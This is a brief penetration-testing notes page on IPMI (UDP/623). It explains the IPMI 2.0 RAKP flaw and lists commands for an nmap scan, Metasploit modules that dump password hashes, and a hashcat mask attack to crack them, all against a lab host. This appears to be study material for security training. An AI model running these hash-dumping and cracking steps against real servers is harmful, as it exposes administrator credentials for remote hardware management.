IPMI

Port UDP/623

Intelligent Platform Management Interface (IPMI) is a set of standardized specifications for hardware-based host management systems used for system management and monitoring.

IPMI is typically used in three ways:

Before the OS has booted to modify BIOS settings
When the host is fully powered down
Access to a host after a system failure

Tools

sudo nmap -sU --script ipmi-version -p 623 ilo.inlanfreight.local

Metasploit version scan

use auxiliary/scanner/ipmi/ipmi_version

Flaw

flaw in the RAKP protocol in IPMI 2.0. During the authentication process, the server sends a salted SHA1 or MD5 hash of the user's password to the client before authentication takes place.

Hashcat mode 7300

hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u

To retrieve IPMI hashes, we can use the Metasploit IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval module

use auxiliary/scanner/ipmi/ipmi_dumphashes
set rhosts <IP>
run

PreviousOracle TNS NextSSH

Last updated 10 months ago